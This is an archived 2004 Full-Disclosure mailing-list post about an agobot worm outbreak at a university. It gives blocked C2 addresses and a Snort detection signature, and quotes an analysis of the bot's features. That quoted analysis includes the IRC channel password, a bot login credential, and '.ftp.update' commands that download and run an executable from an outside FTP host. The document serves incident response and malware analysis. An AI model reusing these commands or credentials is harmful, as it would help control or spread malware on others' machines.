lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: ddh at mtu.edu (David Hale)
Subject: Re: Outbreak of a virus on campus

  We have currently blocked connections to port to/from 7000 on the
following hosts:

130.74.82.206
131.234.100.43
193.87.20.31

  This seems to have contained the spread of the worm within our campus. 
The list of hosts was gathered with a snort signature of:

alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic";
content:"weednet";classtype:bad-unknown; sid:71727; rev:1;)

  Until the block was in place we had shut down around 50 hosts (mainly on
our dorm network) that had been infected with the worm.

  -Dave Hale
   Sr. Security Specialist
   Michigan Technological University

>
> ----- Original Message -----
> From: "Morning Wood"
> Date: Sat, 24 Apr 2004 18:37:31 +0000
> To: mueller@...net.com, full-disclosure@...ts.netsys.com
> Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
>
>> phatbot?
>
> This one is yet another agobot. Has long list of useful commands
> (included in the end of posting, if someone is interested...),
> polymorph capability, stealth capability -hides its own process
> in memory and binary from listing, capable of updating itself
> via ftp/http, has list of servers for evaluating connection speed,
> steals cdkeys, sniffs a wire, performs ddos, capable installing
> a proxy, sends spam via aol, can install identd, has LONG list
> various processes to kill (mostly AV, but also regedit and tcpview
> among others), retrievs sysinfo, makes screenshots etc etc etc -
> looks similar to others good household bot's :)
>
> What makes its interesting - its stealth capability and propagation.
> It has following scanning/propagation subroutines:
>
> CScannerBagle
> CScannerBase
> CScannerDCOM
> CScannerDoom
> CScannerDW
> CScannerHTTP
> CScannerNetBios
> CScannerOptix
> CScannerSQL
> CScannerUPNP
> CScannerWKS
>
>
> When worm is started, it connects to irc server
> 193.87.20.31 (irc.weednet.net) port 7000.
> Then it joines to password ptotected channel
> #1337, password is heyho. As channel topic is
> .scan.startall, it accepts command and starts
> right away scanning.
>
> I took my trusty irc client and joined to that
> channel by myself. Right away admin gave me those
> commands:
>
> <admin> .login stebo jamesbond007 -s
> <admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe
> %TEMP%\xgf.exeBLAOR12
> <admin> .scan.stop
> <admin> .ftp.update ftp://ftp:bla@....uni-freiburg.de/incoming/dt.exe
> c:\xgf.exe BLAOR12
>
> seems like my 'bot' version was too old :)
>
> have fun :)
>
> W.
>
>
> -----------------------
> commands and parameters
> all commands starts with . (dot)
>
>



Powered by blists - more mailing lists